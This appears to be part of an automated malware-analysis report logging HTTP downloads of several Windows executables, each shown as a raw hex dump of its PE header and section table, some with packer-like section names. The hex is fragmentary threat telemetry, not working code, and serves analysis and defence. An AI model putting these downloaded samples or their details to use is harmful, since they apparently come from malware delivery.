Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:24:36 GMTContent-Type: application/octet-streamContent-Length: 1245183Last-Modified: Sun, 24 Nov 2024 11:02:24 GMTConnection: keep-aliveETag: "674307c0-12ffff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 a8 09 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 50 12 00 00 04 00 00 94 8e 13 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 ee 36 02 00 00 00 00 00 00 00 00 00 9f d7 12 00 60 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 ee 36 02 00 00 00 10 00 00 38 02 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 40 12 00 00 10 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:24:44 GMTContent-Type: application/octet-streamContent-Length: 1867776Last-Modified: Sun, 24 Nov 2024 10:27:55 GMTConnection: keep-aliveETag: "6742ffab-1c8000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 f5 ce 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 77 74 76 73 6e 6e 6a 00 e0 19 00 00 d0 2f 00 00 e0 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 63 64 6f 6b 63 73 76 00 10 00 00 00 b0 49 00 00 06 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 5e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:24:53 GMTContent-Type: application/octet-streamContent-Length: 1790976Last-Modified: Sun, 24 Nov 2024 10:28:02 GMTConnection: keep-aliveETag: "6742ffb2-1b5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 f0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 69 00 00 04 00 00 06 62 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 7a 79 75 7a 6a 63 74 00 c0 19 00 00 20 4f 00 00 b6 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 70 73 70 71 78 73 6d 00 10 00 00 00 e0 68 00 00 04 00 00 00 2e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 68 00 00 22 00 00 00 32 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:25:09 GMTContent-Type: application/octet-streamContent-Length: 923136Last-Modified: Sun, 24 Nov 2024 10:26:09 GMTConnection: keep-aliveETag: "6742ff41-e1600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 ff 42 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 66 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 22 9d 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 0c aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 0c aa 00 00 00 40 0d 00 00 ac 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 a0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:25:17 GMTContent-Type: application/octet-streamContent-Length: 2781696Last-Modified: Sun, 24 Nov 2024 10:26:36 GMTConnection: keep-aliveETag: "6742ff5c-2a7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 83 ec 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 69 61 72 76 72 65 00 20 2a 00 00 a0 00 00 00 12 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 63 6b 69 78 6e 6c 00 20 00 00 00 c0 2a 00 00 04 00 00 00 4c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 50 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 24 Nov 2024 11:25:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:25:48 GMTContent-Type: application/octet-streamContent-Length: 2781696Last-Modified: Sun, 24 Nov 2024 10:26:38 GMTConnection: keep-aliveETag: "6742ff5e-2a7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 83 ec 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 69 61 72 76 72 65 00 20 2a 00 00 a0 00 00 00 12 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 63 6b 69 78 6e 6c 00 20 00 00 00 c0 2a 00 00 04 00 00 00 4c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 50 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
